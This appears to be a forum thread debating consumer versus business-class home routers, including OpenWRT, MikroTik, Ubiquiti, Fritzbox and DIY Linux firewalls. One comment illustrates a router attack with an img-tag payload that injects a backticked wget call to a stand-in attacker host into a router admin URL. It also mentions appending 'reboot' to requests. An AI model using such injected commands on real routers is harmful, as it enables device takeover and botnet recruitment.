Avoid Consumer Routers
routersecurity.orgOK, so this argues that consumer routers are bad.
However, no evidence is presented that "business class" routers, as the author calls them, are any better.
And the "Consumer Router Alternatives" section [1] of the site is entirely non-helpful. Just 20 random bullets of different brands with unhelpful notes like "I have no experience with them", "I have heard good things", and "build your own router". The first bullet that recommends the "Peplink" router justifies it solely with... Peplink's own product page. Which is the furthest you can get from an unbiased third-party evaluation.
Don't the same companies make enterprise routers and consumer routers? Don't they presumably employ the same engineers to write software across them?
All of the arguments against consumer routers seems like they could apply against enterprise routers too, unless there's real evidence otherwise. But this post, unfortunately, seems to be quite evidence-free. :(
> Don't the same companies make enterprise routers and consumer routers?
Kinda but not really (the consumer routers are usually made by subsidiaries, e.g. linksys -> Cisco)
> Don't they presumably employ the same engineers to write software across them?
For the most part no, but much more importantly the margins are much worse on consumer gear. Race-to-the-bottom pricing means race-to-the-bottom quality and race-to-the-bottom patch cycles (the last one is probably the most important). Add in that there is a deliberate effort to not make low-margin consumer gear not cannibalize high-margin business/enterprise gear.
A noted exception to this is NetGate, whose pfSense hardware runs the same OS with the same engineering up and down the stack. Probably not the best idea for a normal consumer to buy, though.
We now know that NetGate has questionable coding standards. Best to pass on them.
I'm not sure we know any such thing? They're certainly guilty of insufficient ideological purity with regard to open source, but that's hardly the same thing.
Actually, consumer router running openWRT is quite good[1] or Asus WIFI router using Merlin firmware[1].
[1]https://openwrt.org/supported_devices [2]https://www.asuswrt-merlin.net/download
I want to add that there is an ongoing effort to stabilize SELinux on OpenWRT[1] as well. Security on OpenWRT has been shaping up very nicely for a while now.
I did a Networking BSc and so for the longest time, used aftermarket / open source routers. The last one being a Linksys running openWRT (ACS1900, or something).
I spent countless hours messing with that thing trying to get decent performance out of it, and simply couldn't.
The router provided for free by my ISP is superior in real world usage.
I get the principles in play here with privacy and security and open source etc., but in practice it's a fight I'm done with. Just give me internet that works well out of the box so I can forget about it.
I'm using openWRT on a Zyxel Armor Z2 router. Today they are $170 on Amazon.
The flashing process was exactly the same as the factory firmware. After that I had to configure it just as I would any new router.
It's better than the factory firmware in every way except user friendliness, but even that isn't bad unless you are trying to something more advanced.
The CPE from Comcast was so much slower and worse in every single way. Now it only acts as a modem for the Zyxel.
An important part of my experience is that I deliberately set out to buy a good router that was very well supported by openWRT, because in the past I have had experiences similar to your post (but with dd-wrt in the long long ago).
I really believe if you plan the project like you would a production project you'll have an extremely good experience.
That said, I did have a number of non-standard things I wanted to do on my home network without paying thousands for enterprise level hardware so it was worth it for me to do that work. If I was just getting on line with a couple computers, phones, and tv's I wouldn't have bothered to flash with openWRT.
> The router provided for free by my ISP is superior in real world usage.
I’m impressed. The ones issued by Rogers in Canada are all-in-one-units and complete garbage.
I think they want your mobile phone to drop its wifi to chew through your $10/gb data, prevent sharing with your neighbours and minimize your peak utilization speeds to cut their network spend.
But you probably live in a country where ISPs compete for your business.
Hopefully they'll get better when they buy out their biggest competitor (Shaw) /s
the coddling of our dairy and telecom industry is frankly ridiculous. I was hoping that some American company would enter the Canadian Market but that doesn't seem like something that will happen anytime soon.
I'm a huge OpenWRT fan, but it definitely isn't easy to figure out a reasonably priced router to use it with where you'll get good Wi-Fi performance. I usually stick with the same model recommendation for quite a while.
I get that OpenWRT doesn't want to favor one brand over another, but it'd be really nice if their homepage had a list of 5-10 routers that are really solid with the latest OpenWRT release.
My last router experience with openwrt ended up with me installing a random PR's staging build on my router because that was the only version of openwrt I could find that supported my router's chipset. And then I eventually just upgraded to a completely different router because I couldn't solve the bufferbloat issues created by a gigabit connection without hardware performance improvements.
I started years ago with openwrt.
First I tried the tp-link TL-WDR4300, which was very well supported at the time.
I then moved to the tp-link Archer C7.
Along the way I went from a "regular install" of openwrt, to build the LEDE fork myself, then back to building openwrt.
It's actually quite straightforward after you get over the hump.
I got away from the GUI and now do most configuration via the config files in /etc/config.$ git clone https://git.openwrt.org/openwrt/openwrt.git $ cd openwrt $ ./scripts/feeds update -a $ ./scripts/feeds install -a $ make menuconfig $ make -j $(nproc)my current router is a wrt-1900acs, which took a while to get stable. I sit it on the shelf for a good year.
Because I learned how to build openwrt, I also have two mikrotik rb3011uias-rm 10x gbe switches. I wish the touchscreen worked.
It's not in the main tree but I followed this thread:
https://forum.openwrt.org/t/support-for-mikrotik-rb3011uias-...
It's a community build, but it is stable and works well.
If you want to play with openwrt, it's a little saner to have two routers. Have one that works, and one that you can break without having to stay up all night to get online.
> If you want to play with openwrt, it's a little saner to have two routers. Have one that works, and one that you can break without having to stay up all night to get online.
There is a learning curve when using openwrt. When my girlfriend demanded that I stop effing up the wifi at some point. That's when I decided to get a second router to test new and complex configurations.
For those thinking of trying this, you may have trouble with throughput on certain chipsets. I'm extremely happy using OpenWRT on my rPi v4 with 2 UE300 USB-to-ethernet adapters and gigabit Internet.
It's also a bit cheaper to do this than buy high-end consumer equipment as nimbius mentioned.
> Actually, consumer router running openWRT is quite good
Really? Can the *WRT releases finally run at full speed? Can they ping from the wired to the wireless? Can they actually do MIMO?
As much as I love open source, the *WRT developers have a bad hand and it's not their fault. There are a zillion router variants that change with zero notice, no documentation from anybody, and not enough people.
This really is a spot where an actual open source hardware design is probably the only real solution.
consumer routers that can actually run the latest version of either of these cost around $200, which in my opinion is better spent on something more powerful and hacker friendly like Alix https://www.pcengines.ch/alix.htm
I run a combination USB 2.4ghz AP and 5ghz pci-e from one. In addition, it runs a podman rootless pihole container and handles wireguard.
You don't need a $200 router to run the latest versions of OpenWRT. You only need to spend that much if you want high-end WiFi radios and fast CPU cores. If you're fine with mid-range WiFi capabilities and slower MIPS CPUs that can't do QoS beyond 100-200Mbps, then there are plenty of options well under $100.
My under $100 router didn’t work because it had too little ram and flash storage to work. It was a few years ago though so maybe the situation has changed. I’d be interested in seeing which routers under $100 are working well with OpenWRT.
i really like my https://www.gl-inet.com/products/gl-ar750s/ : comes with a GUI on top of openWRT that allows easy static IP assignment from MAC, wireguard config as either server or client, etc. you can always drop into LuCI as well, or reflash with latest openWRT. plenty of storage for additional services and packages if that's your thing.
no affiliation, just a happy customer!
I was going to say there are plenty of routers that work fine, but then I looked at the latest stuff on the pcengines page.
It's a little daunting, like looking at the openwrt table of hardware (but inside out like a menu).
Problem with all alternative firmwares is that you don't know whether your relatively new product will be supported or not. Sometimes it's matter of product revision.
You can say the same about running Linux on your laptop. The answer is that you don't buy the random $20 routerat Walmart and hope that you can install openwrt on it. Instead, you buy the router specifically to install openwrt on it. It's certainly a bit more painful but you get used to the idea of using a bit older gen hardware but enjoy excellent software supoort.
Over time, with enough people do it, the manufacturer will realize that and cater to you (see the Linksys 54gl router, archer c7, dell laptops, and Lenovo Thinkpad -- the manufacturer all know people buy the hardware to run the software they want)
+1 for Merlin, I use it in a household of four people for QoS and it's great!
Isn't Merlin just the Asus firmware with some additional features? From a security perspective it does not seem like an upgrade since it still includes many proprietary Asus blobs.
How much does the "proprietary blobs" matter, for something like a router? It sort of makes sense a cellphone where there's basically a parallel operating system running in the baseband, but that doesn't really apply for a router. The biggest threat is probably out of date services, but AFAIK most of those (eg. dnsmasq) are open source and are kept up to date.
Depending on the router, a whole bunch: I had an ASUS router that could only maintain about 150-200 Mbps of NAT traffic using the CPU whereas with the magic cut-through blobs it could do a full 1 Gbps.
The kernel is stuck on whatever version it shipped with. A lot of routers use the long obsolete 2.x kernel.
I have an older Asus that I want to flash with Merlin as well.
Will Merlin flash like a normal firmware update or does it require the Windows based “recovery tool” to force the flashing of Merlin?
Thanks for any response.
Merlin can be uploaded as a normal firmware. No flashing or external apps required. If you have a compatible asus I highly recommend Merlin.
If you’re interested in doing as-blocking on the router itself there’s a tool called diversion which does take a bit of work to get installed, but is a bit simpler than trying to get oí-hole running on it: https://www.snbforums.com/threads/diversion-the-router-ad-bl....
Not only can you run diversion, you can then run a vpn and always tunnel through your VPN with diversion.
DNS leakage is one other thing to solve.
Does OpenWRT still run everything as root? That's not good security practice.
True, but the stock software on any cheap router you buy is also all running as root, assuming that there's even a concept of users, or any other kind of isolation, in the OS it's using.
The standards on that stuff are shockingly low. I mean, think about the stupidest, laziest, most slipshod shit you can imagine, and then be assured that it's worse than that.
... and "small business" routers are only slightly better. Even "enterprise" equipment isn't all that stellar.
Personally, I use real Linux as a router, and a separate WiFi access point behind it that gets as little trust as I can manage.
On my router running OpenWrt 19.07.6, it appears that dnsmasq and avahi are running as non-root.
Yes, but so is having the password check happen on the client-side, which I have seen happen in two different routers' stock firmware I've owned in the past.
As someone who has worked on firmware for network devices, including the UI/presentation aspect, I feel obliged to point out that there are people working in that part of the industry who take security seriously, and likewise there are people working in that part of the industry who take the presentation of both hardware and UIs seriously.
At the same time, I can’t really disagree with the general sentiment that a lot of firmware in embedded devices, router or otherwise, is very poor. The thing I’d add is that it’s not just consumer-grade products with this problem, there are plenty of supposedly professional-grade devices where the firmware is junk too. The worst products I have ever had in my typical small-office work environments were the Cisco-branded “small business” range, which in specs and appearance did look like they were being pitched at that market, yet which never performed accordingly and mostly failed after an unreasonably short amount of time for equipment in this class.
To be blunt, a big part of the problem is money. Think about the kind of developer who has gained a few years of experience and has the skills and interest to do a good job solving challenging technical problems. Look at what that person can earn working for a FAANG or a financial services firm, or the potential upside for them at a startup if they get in early and there is a big exit. Look at the work environments they have in those roles. Now look at what a whole team of those people would earn collectively for writing router firmware and tell me which number is bigger, and look at their work environment and tell me where you’d rather be spending a significant fraction of your waking hours. In short, the people you find working in this area with real ability tend to be those who enjoy this kind of work enough to give up a lot of other benefits to do it. Obviously that restricts your talent pool and then manufacturers have to fill the gaps with whoever else they can find.
It comes down to the age-old reality that many customers prefer to buy junk as long as it’s cheap. Sadly, I doubt this will change any time soon, whether we’re talking about consumer routers or TVs or whatever IoT device someone decided would make their home smarter this week. Maybe if something really bad happens, the market will shift and/or governments will step in and regulate to try to force better standards for things like security and updates. In those cases, I would expect to see both significant consolidation in the consumer devices market and significant price increases follow quickly afterwards.
>The thing I’d add is that it’s not just consumer-grade products with this problem, there are plenty of supposedly professional-grade devices where the firmware is junk too.
Absolutely. An example: https://www.youtube.com/watch?v=B8DjTcANBx0
There are $5000 security cameras placed in very sensitive areas with security just as poor as the $50 trash you can buy from Office Depot (or at least it was the case 8 years ago).
I mostly agree with your post. However, I must point out that some people get paid _very_ well to write router firmware. Just maybe not consumer grade router firmware. Where the margins are high on the hardware, typically the salaries are as well.
I don't know much about networks and haven't worked on any on-device software - I mostly work on element management systems.
Even on the high end there is a race to commodification. Router manufacturers have some similarity to server manufacturers like Dell - they get hardware and software components from 3rd parties and put them together. Your main bespoke software contribution might be device drivers and a data model.
High pay may not automatically translate into quality because there are other forces in play.
There are at least a few use cases that can never be commoditized. My wife's ex used to do work for Wood's Hole developing firmware for acoustic routers intended to network submarines. Somewhat ironically, he thought it was just for scientific use but the US Navy was actually funding the development. This paid reasonably well for 15 years ago.
Interesting! I don't disagree with you, but to jump off this...
I think there are some parallels to metro fibre networks. You have devices/pluggables with xxxG throughput. MUX/DEMUXs, ROADMs and ILAs are expensive. High cost, high margin.
But you don't make the optics. You're buying them from the same supplier as your competitors and you can't buy that company because you'll kill the market because your competitors won't buy from you and all you'd be left with is an interop problem. The second problem is that the market is small. Few outfits build these networks and they are often monopolies in their geo. There is little growth.
Commoditization is not the only problem.
I have a rule of thumb, which didn't fail me yet - don't buy fancy looking networking gear. Buy the ones which look like ugly military tech (not fancy military tech) or something you could see in a factory. I have two failed fancy wifi routers, two failed good-looking switches, but one wrt54-gl still working and two metal-cased 5/8 port switches which are older but still working. With fancy looking gear, while it worked, there were always stability problems.
Ubiquiti Unifi is exactly in that spot. Looking Apple like good and considered business/professional (at least in this article .. we all know they have their problems).
Generally, I completely agree with you. The high-end products do not look fancy normally.
For now... The stories of firing most of the US dev team in San Jose last year to outsource to cheap foreign dev teams and new product pushes like this bizarre frontrow life cam thing give me a lot of concern for the future of Ubiquiti. The past 3-4 years to this point were pretty great product-wise though. I'm pretty heavily invested in the Unifi ecosystem but have already started keeping an eye on the good stuff competitors like Mikrotik etc are making.
I dunno, I'm in the process of replacing all my Ubiquiti gear, because:
- A firmware upgrade to my switch last year enabled some sort of loop detection that would shut off ports that my Google WiFi mesh was connected to (Ethernet backhaul). Support was nice, but ultimately unable to disable that new feature of the firmware. - My original camera NVR was flaky, possibly because of camera flakiness, partly also because it just couldn't keep up with 4 cameras. - Replaced NVR with CloudKey Gen 2, which was fairly nice but then brought the camera flakiness into full view. I would spend DAYS every quarter messing around with rebooting cameras to get them to reassociate with the Unifi Protect server. - A recent firmware update to the cameras left 4 out of 5 of them totally dead, unable to even be pinged, let alone associating with the Protect server.
On the plus side, the Unifi Protect mobile app is easily best in breed. Light years ahead of ReoLink or Hikvision or Montavue (I've played with all of them recently). The BlueIris mobile app seems to be pretty crappy, but I haven't shelled out the money to actually try it (based on the reviews).
I've replaced the switch with ebayed Enterprise gear, Aruba S2500 for <$100. Harder to set up, but did have enough knobs to disable the loop detection. A great PoE switch, plus it has 10Gb ports.
The cameras I've replace with MontaVue 4K cameras, which are amazing in low light. 10x the sensitivity of most other cameras in low light. I also got their DVR, which is ... meh. The mobile app is basically unusable for anything other than live view. The DVR is probably fine if you use it from a keyboard/monitor, but this is for my house and we really want a good mobile app, not some silly console. The cameras though! <chefs kiss>
It’s frustrating how UniFi things like the UDM-P require something at Ubiquiti’s end to be up for it to work properly.
You can still use the web gui when Ubiquiti’s stuff falls over, but the app stops working.
The equipment is far from rock solid, unlike the edge range in my experience. However the leaning curve with UniFi is very shallow compared to Edge.
Agree with this especially with switches and stuff that is usually going to be mounted on the back of a cabinet or somewhere else where it will never be seen.
Personally, I would never buy SoHo networking hardware that does not have decent OpenWrt support - the platform is supremely flexible, hackable, and secure.
If you're in the market for a new device, look at https://openwrt.org/toh/views/toh_available_16128 as a first step (and avoid devices with Broadcom's involvement).
PCEngines APUs are great router devices to put whatever you want on, including OpenWRT. Proper Intel NICs (Realtek is not great for routers) for cheap.
I'd also strongly suggest to have router and access points as separate physical devices.
A great step up for someone with an AIO consumer router/WiFi AP would be to get something like that as a router, flash OpenWRT on the old router and transform it into a "dumb" access point.
I bought an x86 box from China with 6x Intel i210 GbE NICs onboard a few weeks back and reviewed it here: https://johannes.truschnigg.info/reviews/2021-01_fwbox/
It's my favorite OpenWrt router so far, and I've owned quite a few since I started using it on a WRT54G :)
Thanks for the great writeup. I got to know about a lot of ls** commands that would be useful in future. I built similar with OPNSense using QOTOM Q515G6[1] which looks eerily similar to what you got from AliExpress. So in a way reading your article was more like knowing my own router better. Thanks. [1] https://www.amazon.com/gp/product/B07DLYGZG4/
Thanks for writing about it - I was actually close to pulling the trigger on another of their boxes a few moons back, great to hear it's good in practice as well :)
(...Personally I avoid Intel CPUs best I can, though. AMD's ME equivalent on the APU can actually be disabled, which happens to be something I care about for something like router)
Has there actually been any research into the disabling of AMD PSP like there has been surrounding me_cleaner?
All I remember regarding AMD PSP was that one motherboard manufacturer showed the option after an update and the other you had to flash a modified BIOS to expose it.
But besides this discovery by a user, there hadn't been any research or verification that this software option does what it claims.
I am also an owner of these devices. I am not knowledgeable if this is as trivial for AMD CPUs in general, but I know that specifically for the SoC in the APU, since i build my own image anyway, it's a simple configuration flag there:
That seems to be only for TPM, which isn't usually what people refer to when talking about Intel ME.
Thanks for sharing that. It looks quite a bit more powerful than PCEngines APU boards, and cheaper than the Qotom boxes it's imitating. And it's nice to have a detailed review showing it works as expected.
Can confirm that. I run an apu1c4 with pfsense on it behind the isp modem(in single user mode) for multiple years now. No issues so far :)
I'm using a 7 years old TP-Link router wifi, the last official firmware available is from 2018. I disabled features like remote administration and file-sharing. I also setup WPA2, disabled WPS and have a strong password on the admin. What is the real risk for me? I get that it is always preferable to have an up to date device for security but I also wish to not create more electronic waste (and I unfortunately have stability issues with OpenWRT). From my understanding cracking a WPA2 passphrase isn't as easy as it used to be with WPA1 or WEP, and not having the admin interface exposed to the outside world limit the risk of someone breaking in. So realistically, assuming I'm not targeted by some APT group, would breaking into my router be that easy?
It depends. If there's a vulnerability in the firmware that allows unauthenticated code execution from a generic GET request, malvertising on your computer could load an IMG tag with the SRC set to your router's IP and deploy malware to your router. From there your router could become part of a botnet, the router's DNS settings could be changed to redirect websites through some malvertising DNS server, and whatever the router can access in your network (dev database server?) could be extracted. Sometimes all it takes is an <img src="http://10.1.1.1/admin/getSettings?command=`wget http://ev.il/|curl`" /> in an ad.
Such vulnerabilities are more common than most vendors would like to admit. Adding `reboot` to random GET requests gets you quite far with quite a lot of consumer routers. I have little experience with TP Link software outside of flashing OpenWRT on their hardware.
There's been already scanners that target specific ISP routers for specific ISPs in specific countries already. In practice the probability of getting hit like this is very low, but the risk is still there.
With four years of updates, TP Link might actually care enough about security to not allow trivial exploits to execute code on their routers. Many vendors I know won't update past a year or two. I'd say the risk is low to very low in practice, but I'd watch out with running sensitive services (if you're in a healthcare startup, for example) while working from home.
Yes, but;
Consumer routers all have security holes that can be exploited even when you do everything correctly like you did.
https://www.cvedetails.com/vulnerability-list/vendor_id-1193...
Looking at this one:
Your only safe(ish) bet is to build your own, and hope that Linux/BSD close all the exploits that get discovered.TP-Link TL-WR940N is vulnerable to a stack-based buffer overflow, caused by improper bounds checking by the ipAddrDispose function. By sending specially crafted ICMP echo request packets, a remote authenticated attacker could overflow a buffer and execute arbitrary code on the system with elevated privileges.
Simple question:
What if my space at home doesn't allow for a half rack of equipment and required cabling?
OpenWRT is no panacea. It generally doesn't support higher throughput modes in wireless radios in said routers and I need these features (thick walls, wifi first devices, etc.).
17 shows the author considers higher end routers, like the ubiquiti unifi routers, are not in this class.
I bought unifi specifically because I wanted some professional features (proper in house roaming, wifi bridge, and VLANs) but live in a rented house where I cannot carve out some decent rack space or channel the walls.
You probably (or at least most people) don't need higher throughput modes in wireless radios. You need good connectivity, which can usually be achieved with a larger number of simpler APs, instead of 8x8 MU-MIMO 3-band 2666Mbit, that only works with manufacturer's firmware.
You can get 3x3MIMO 802.11ac routers with good openwrt compatibility for 60-80$, that should give you gigabit speeds and there are cheaper versions (get at least 2x2 @5GHz). Check for openwrt support before buying. You do not need a rack full of equipment, though you would need to reasonably distribute APs with cables.
APs that are properly distributed, running on minimum TX power, yet close so they use highest rates, will beat every single overpriced AP. May need some adjustment for corner cases.
802.11ac wave2 and especially ax have very useful features, but they are no match for fundamental properties of radio wave propagation.
¹ Close mostly means distance at line-of-reflection for 5GHz channels and line-of-penetration for 2.4GHz.
It also depends where you're living - ferroconcrete apartment building is something else than drywall house.
Also 3x3 only gives you close to gigabit speed (realistically 700 mbps) when both ends are 3x3, and only very expensive and special workstation class laptops (including 15" MacBook Pros which belong in that category at least by pricing) are that.
2x2 laptop won't have better than 866 PHY speed in ac and that's realistically about 500 mbps single duplex.
Smart 4x4 device can use the extra streams for range - but that only ever works with original firmware, there's a lot of magic and patents involved.
You should consider something from MikroTik's home-and-office range - I use the hAP ac² which I've been happy with.
The software is worlds apart from any consumer router I've had before. The only downside is the number of settings is intimidatingly large, which might make it a poor choice for gifting to your less tech-savvy loved ones.
Mikrotiks are not user friendly though. If you don't know at least a bit of networking it can be difficult to set up.
There's no better bang for the buck, that's true.
Also, Mikrotiks are behind even mid-range consumer devices in Wifi. You can get 4x4 ax wifi from Asus and it's going to work great.
Mikrotiks are very stable and reliable but not that fast.
Of course, it depends on speed of your internet connection. You don't need 4x4 wifi if you have 100 mbps internet, but it's kind of annoying to pay for 500 mbps cable (because they don't offer anything slower) and be bottlenecked by wifi.
> OpenWRT is no panacea. It generally doesn't support higher throughput modes in wireless radios in said routers and I need these features
I doubt this generalization is true. With OpenWRT, you're generally screwed if your router uses Broadcom WiFi, or you get full speed from the other common radio vendors. My Qualcomm-based 802.11ac router running OpenWRT has no trouble maintaining link rates of 866Mbps or higher with several devices in my home (5GHz band, 80MHz channel).
My "rack" consists of three devices wall-mounted above the coatrack in the hallway: a Jetway industrial computer, a PoE switch and a UPS. Of those, only the computer would be essential for your use case. I'm one of those people that prefers to have wired ethernet all across the house, so the switch is mainly to power two additional switches in different locations.
The Jetway computers are similar to NUCs, but geared towards industrial installation rather than home consumer use, so they generally lack 4K HDMI support but include options for multiple serial ports, usb ports or network interfaces, similar to this: http://www.jetwayipc.com/product/hbjc390f841xx34b-series/ . Mine runs OpenBSD right now, but that doesn't support the Wifi card so I'm planning to migrate it back to Debian.
A small ARM or Atom box with dual ethernet makes a great PFSense box. That would be my recommendation.
That would thoroughly defeat my purpose.
The solution will require a modem, a PFSense box and an access point, at least. This is again some cables, at least three adapters and more space requirements.
I can manage a much complex setup if I need to, but space and noise is at premium, so it won't help in my case.
You can have PFSense act as an access point if you install a Wifi adapter in the box you use as a router. Depending on the square footage you need to cover, you might not need anything else.
Edit: Just saw the bit about thick walls. Sticking to 2.4 GHz might have a better result if your neighbors aren't too close.
Mikrotik is doing better at offering home router solutions. They now have a quick-setup page and an Android application that makes it much easier to configure.
Just got a new Mikrotik RBwAPG-5HacD2HnD that has a quad core ARM CPU, dual chain, dual band wifi. Highly recommended.
> Just got a new Mikrotik RBwAPG-5HacD2HnD
That's a wireless access point, not a router. Different animal.
For WAPs, I'm waiting for 802.11ax/bd to be more reasonably priced. In the mean time, it's wires for me.
It is a router and WAP. It has two Ethernet ports, one for WAN, one for LAN, both Gigabit. It also has an integrated WAP. You can of course use it just as a WAP, but yes, the default configuration is a router.
It can be used indoor and outdoor, it has PoE if desired and mounting brackets.
But yes, it is a router in the default configuration.
The capabilities of MikroTik devices are kind of inscrutable to those who have never put hands on them. Yes, they can route (in software). Yes, they can switch (in hardware, across most ports, depending on where they attached the switch controller chip). _All of them_. Some will be faster at some things than others, but by and large, all MikroTik devices have approximately the same capabilities (at potentially vastly different levels of performance, but checking the same boxes nonetheless). The key difference between different models are the physical interfaces (number and characteristics of the Ethernet ports, SFP ports, wireless radios). At a software level, RouterOS is basically just Linux with a consolidated and more consistent management interface.
I'd dare bet that the WiFi-radio and 1000BASE-T -ports are indeed not switched, but connected to the CPU, which as stated above looks very much like a router :)
There's sadly no block diagram released for these, which would document the internal topology. I also do not have this exact device anywhere to look this up from.
Thanks, that looks pretty compelling.
It's quite a job to get closer to wire speed with 802.11ax still... Let's assume dual spatial streams and devices that not quite support anything past U-NII-1.
https://en.wikipedia.org/wiki/List_of_WLAN_channels#5_GHz_(8...
https://en.wikipedia.org/wiki/IEEE_802.11ax
This leaves us with 5x20MHz spectrum and while being good netizens we'll leave some of that free for others (and ourselves), so we use just 40Mhz of that.
With the tightest modulation and guard interval even, theoretically, we will acheive at best 573.6Mbit/s simplex and not the best of latency and jitter.
I'm not saying that 802.11ax is not worth the money. I am however saying that getting closer to garanteed Full Duplex 1Gbit/s is hard. And I still have 2.4Ghz-only -devices still in daily use.
I have a Mikrotik RB2011Ui. I like it but don't love it. For the price it has a lot of features. RouterOS CLI is no worse than others I've used. It has an SFP port if you need to do fibre to the kitchen. I have not been brave enough to try OpenWRT on it. RouterOS doesn't do NETCONF which I find disappointing.
If you buy something with Mikrotik RouterOS on it make sure you read a hardening guide and how to upgrade and keep and eye on the CVE list.
I have an HAP AC2 and while I had few issues with it (I work in networking) it's absolutely not consumer-friendly nor consumer-ready.
is the Fritzbox available in the us?
it's an excellent security maintained choice in europe, for combined cable or dsl modem, router, wifi access point, nas device, phone switch and voice mail box.
It's AVM, so it's specifically mentioned in the article for _not_ being available in the US.
And yes, I've been using Fritzboxes (upgraded in 2017 for better wifi, to another Fritzbox) since 2011, and it:
* reliably auto-updates,
* has the best built-in software I've seen (no OpenWRT, but nothing that would motivate me to install OpenWRT)
* has been getting updates for many years.
It's not the prettiest, nor does it go for (my preferred) rack-mounted look, but it works and it lives in a broom closet anyway.
Also you can run Freetz, a way to extend (not replace) the router software. It has enabled me to run mDNS for split DHCP.
second this - get a Fritzbox whenever possible. Stable, very long updates (even newer features) and easy to use. They seem pricy, but longevity will make up for that.
The majority of the points tend to be based on the facts that the firmware is shit, isn't updated for long, and visibility into the firmware and it's releases is murky and opaque.
So what if you wipe out the firmware and go for openwrt? how does balancing for compatibility with openwrt and consumer router hardware rank on this scale?
OpenWRT support does not come free. There are volunteers that need to spend lots of their personal time so that a consumer router may get reasonably good support in OpenWRT.
Whole range of chipsets with no free software support are immediately excluded from OpenWRT.
> Whole range of chipsets with no free software support are immediately excluded from OpenWRT.
True, but it reminds me of where printer support used to be in Linux, say, 20 years ago: Lots of shitty printers weren't supported. Sometimes, yeah, that's a deal-breaker, but if you're in a position where you can buy one, plenty of good hardware is fully supported.
GPUs are a much better analogy than printers. Broadcom WiFi occupies the same status as Nvidia GPUs: #1 in the market, hostile to open source, but their main competitors work fine on Linux without the hassle of closed-source driver blobs.
It surprises me how many otherwise experienced system administrators consider a home router something you have to buy and get a completly unsuitable plastic throwaway gadget. It’s an internet-connected device, therefore you have to treat like any other server¹. Get a computer, stick a wifi card in it, install your favorite Linux distro, configure the networking (including DNS resolver, DHCP daemon, hostapd, firewall rules, etc.). Keep it updated in whatever way you keep all your other servers updated. Done.
Normal consumer routers are bad for the same reason that just about all IoT devices are bad. This will not change unless the incentives involved change; i.e. don’t hold your breath.
What are people’s thoughts about the Turris Omnia[0]?
Does it hold up to their claims and is it playing nice with American ISPs like charter?
I like the hardware but I don't like the default software that's on it. NIC.CZ is already spread too thin and I get the feeling that they are not prioritizing their router branch on the level it should be.
I'm considering running Alpine on it but so far that's pretty much uncharted territory.
I have a turris omina. I have no real complaints. It is way better than any other router I've owned. It is the only one I've felt comfortable to do anything fancy with.
I currently have mumble and a nextcloud server running on the router, and a wireguard interface.
I can't comment on any US ISP weirdness as I live in europe.
Great to hear! I love the ability to swap out wifi cards or even insert a wan module. Great it wifi cannot be trusted as a fallback.
I own Turris Omnia from 2019, it works flawlessly, recently added LTE card for backup connectivity.
My stock Debian x86 mini-ITX firewall is now 7 years old. It has been upgraded across three stable releases and will go to bullseye sometime this year. It handles stateful firewalling, IPv6 routing, failover DHCP, DNS caching, NTP... and it has lots of available capacity in CPU and RAM.
It was expensive for a home firewall but not horribly so, and I fully expect it to have a ten or twelve year lifespan with full support. If the NIC fails, I can replace it -- it's a PCIe card. If the storage fails, I can replace it -- SATA SSD. Neither of those have happened yet, but I might replace a fan sometime soon.
These days I would probably buy a tiny NUC-like object with enough gig-e ports.
I've often thought about doing something like this over the years...but the enthusiasm (if that's the right thing that i feel) often wears away, when i'm just sitting down after a very long, hard day of work to watch netflix...and then "the internet is down". Clearly i have no experience doing what you described, and my fear of added maintenance might be inaccurate...but i do wonder if this is better in the long run. Do you find that such an approach creates lots more maintenance work for you?
If you are not doing anything fancy with your current router, using debian on an x86 machine as a router will work indefinitely. All you'll ever do is apt update.
Nice; ok thanks!
I been running similar setups for past 20 years or so. It's as much maintenance as you want it to be after initial configuration
That's a long time; thanks!
sure. i am now on 4th iteration of gateway (setting it up now). first one died (early 2000s.) second couldn't deal with 120mbit adsl speed. third had 2 mini-pcie cards inside to server as AP. for past couple of years tried edgerouter-x flashed with openwrt, but it was... "not it" (selection of packages is vast, yet limited) so i went back to x86 based one. one interesting side effect, is that much talked about bufferbloat disappeared after i switched to it from edgerouter, even without any queue management (have 1gb cable at home).
Debian has no bugs - heard it here first!
MikroTik hAP ac2 (RBD52G-5HacD2HnD-TC) - all you need and then some for fair price.
MikroTik hardware is nice but that company has a serious case of nih syndrome. This manifests as a lot of cryptic, undocumented commands plus the occasional showstopper exploit (eg https://nvd.nist.gov/vuln/detail/CVE-2020-13118). As an added benefit, they have a cult of online followers who are all too happy to deride anyone who points these (and other) flaws out as a clueless nontechnical moron. Fwiw I'm transmitting this through one of their routers.
That CVE is for third party software. But this brings up a good point. It has a good API surface you can plug into in many ways.
There have been some CVEs, but all the exploits I'm aware of already had patches and were only exploitable for un-updated models.
I honestly don't know what you mean by not invented here. They did create a wireless protocol for point-to-point products with some advantages for those who opt into it, but that's the only thing I can think of.
Sometimes their documentation is lacking, but generally their docs are very good.
Is Mikrotik Router Monitoring System an actual MikroTik software, or is third party open source project? Doesn't seem to be provided by MikroTik: https://github.com/adeoluwa-adebiyi/Mikrotik-Router-Monitori...
Still using the hAP ac that I ordered 5 years ago and it works great. After some time I needed more ports, so I added Mikrotik switch in the mix that gets powered by hAP ac PoE out port. Great hardware and great software at low prices.
That one is 2x2 so you're not getting a lot of bandwidth or range.
The majority of client devices are 2x2 or even 1x1, so for most setups it won't make much of a difference, if any at all.
If you need a more advanced AP, you probably shouldn't be looking at all-in-one devices. Buy separate components, add as many APs as you need for proper coverage, rather than relying on a single device to cover everything.
Absolutely this. I put the "Super"hub I got from Virgin Media in modem mode immediately and installed an ac2, and the experience has been lovely.
I am loving my Edgerouter 4 + Unifi APs. Home network is rock solid. If only I could figure out why my ISP is dropping 20% of packets to Cloudflare DNS.
Not sure about your ISP, but CenturyLink for me seems to have something against 1.1.1.1, but not 1.0.0.1 though.
CenturyLink uses Calix GigaCenter routers which have an embedded http server at 1.1.1.1. Cloudflare calls them out here: https://blog.cloudflare.com/fixing-reachability-to-1-1-1-1-g...
I am on WOW. It seems like the connection to Chicago is the problem and that is where most of my traffic goes (I am in Detroit) but requests to MSP are fine. I notice similar issues when loading images via the ORD datacenter.
Cloudflare has been having some weird issues with Chicago lately. I had to outright ditch them recently and switch to OpenDNS because my internet would just stop working due to their DNS failing.
Huh, that’s a helpful datapoint. I figured it was just WOW customers because we have been having frequent outages recently. I am on Level3 now since after running some benchmarks it appears to be the fastest for me.
Anyone consider the Odroid H2+? It's a relatively fast CPU (for a router) the Intel J4115, relatively low power (10 watt TDP), max ram 32GB (plenty for a router), has two 2.5 Gbit ports, with an option to add 4x2.5 Gbit for $47. Also has a eMMC and M.2 slot for reliable storage, to avoid any ugly USB connected storage for boot.
